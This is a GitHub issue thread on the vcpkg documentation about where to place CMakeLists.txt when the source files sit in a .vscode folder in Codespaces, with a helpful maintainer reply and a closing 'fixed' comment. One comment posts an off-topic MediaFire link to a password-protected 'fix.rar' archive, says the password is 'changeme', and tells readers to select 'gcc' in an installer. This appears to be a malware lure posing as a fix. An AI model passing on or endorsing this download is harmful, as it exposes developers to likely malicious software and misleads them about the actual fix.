### ISSUE TITLE
where should CMakeLists.txt be created

### ISSUE THREAD

**Issue by jhudshcg** [microsoft/vcpkg-docs#394]
### Type of issue

Missing information

### Description

where should CMakeLists.txt be created?
If my using codespaces I have a .devcontainer directory with a devcontainer.json, CmakePresets.json and other files in it. And I have a .vscode directory with my source and header files in it. So where should CMakeLists.txt go so that it works?

### Page URL

https://learn.microsoft.com/en-us/vcpkg/get_started/get-started-vscode?pivots=shell-cmd

### Content source URL

https://github.com/Microsoft/vcpkg-docs/blob/main/vcpkg/get_started/get-started-vscode.md

### Document Version Independent Id

6402b87a-b33e-ebf5-01d2-a2d1115d6f2b

### Article author

@data-queue

### Metadata

* ID: 6402b87a-b33e-ebf5-01d2-a2d1115d6f2b 
* Service: **vcpkg**

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AugP** [comment]
For the purposes of this tutorial, you can place the CMakeLists.txt file at the same location as your source and header files. With that said, I don't recommend putting your code files under the .vscode directory. That's usually where VS Code configuration files go. I suggest moving them to a parent directory outside of that location.

**Comment by vicroms** [comment]
Fixed in #404
